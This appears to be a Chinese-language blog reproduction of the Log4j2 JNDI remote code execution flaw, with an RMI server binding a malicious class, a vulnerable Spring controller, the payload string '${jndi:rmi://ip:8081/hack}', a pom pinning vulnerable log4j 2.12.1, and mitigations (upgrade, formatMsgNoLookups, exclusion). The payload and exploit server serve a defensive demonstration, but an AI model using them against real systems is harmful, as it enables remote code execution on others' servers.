先说一下漏洞,看代码吧(漏洞复现)
描述:
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新至 Apache Log4j 2.15.0-rc2 版本。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。
影响版本:
经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下:Apache Log4j 2.x < 2.15.0-rc2
public class HackService {
public static void main(String[] args) {
try {
// 启动服务
LocateRegistry.createRegistry(8081);
Registry registry = LocateRegistry.getRegistry();
// 创建资源
Reference reference = new Reference("com.example.log4jdemo.hei.HackTool", "com.example.log4jdemo.hei.HackTool", null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
// 绑定资源
registry.bind("hack", referenceWrapper);
System.out.println("服务初始化完成");
} catch (Exception e) {
e.printStackTrace();
}
}
}
public class HackTool {
static {
System.out.println("先来一个 -> rm -rf /");
}
}
@RequestMapping("test")
@RestController
public class TestController {
private static final Logger logger = LogManager.getLogger(TestController.class);
@RequestMapping(value = "search")
public Object test(@RequestParam String str) {
logger.error("入参:{}",str);
return "OK";
}
public static void main(String[] args) {
String str = "${jndi:rmi://ip:8081/hack}";//${jndi:rmi://ip:8081/hack}
logger.error("入参:{}",str);
}
}
@SpringBootApplication
public class Log4jDemoApplication {
public static void main(String[] args) {
SpringApplication.run(Log4jDemoApplication.class, args);
}
}
对应的pom文件
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.7.RELEASE</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<!--<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
<version>1.18.16</version>
</dependency>-->
<!--升级到2.15.0就好了-->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.12.1</version>
<!-- <version>2.15.0</version>-->
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.12.1</version>
<!-- <version>2.15.0</version>-->
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
通过测试发现我们在使用2.0–>2.14版本的时候会出现漏洞,log.error的时候会调这个接口jndi:rmi://ip:8081/hack
解决方案1(升级版本)
升级到2.15之后就不会调用了也就解决了这个漏洞
解决方案2 (临时方案)
JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true
log4j2.formatMsgNoLookups=True
FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true
具体操作如下:
- nohup java -jar -Dlog4j2.formatMsgNoLookups=true xxx.jar &
- 在resources目录下新建一个
log4j2.component.properties
文件里面放log4j2.formatMsgNoLookups=True
即可 - 在系统环境变量中添加
变量名:FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS
变量值:true
解决方案3(排除log4j)
可以通过maven helper
来排除掉log4j的依赖,因为有时候这些依赖并不是自己依赖进来的可能是您所依赖的的依赖里面的依赖